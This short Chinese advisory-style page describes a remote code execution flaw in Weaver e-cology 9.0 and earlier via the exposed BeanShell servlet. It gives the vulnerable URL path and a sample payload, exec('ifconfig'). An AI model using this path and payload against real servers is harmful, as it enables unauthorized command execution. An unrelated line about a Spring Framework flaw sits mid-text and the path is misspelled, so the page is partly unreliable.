泛微e-cology远程代码执⾏漏洞
影响版本:泛微 e-cology<=9.0
漏洞分析:   
问题出现在 resin 下 lib 中的 bsh.jar ⽂件⾥,问题类 bsh.servlet.BshServlet,可 doGet ⽅法从 getParameter 中接收参数, Request 请求会交给evalScript ⽅法来进⾏处理。参数传递
doGet--》getParameter--》 evalScript--》 localInterpreter.eval
漏洞利⽤:访问 url/weaver/bsh.servlet.BshServleth
springframework远程代码执行漏洞
输⼊payload
exec("ifconfig")

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。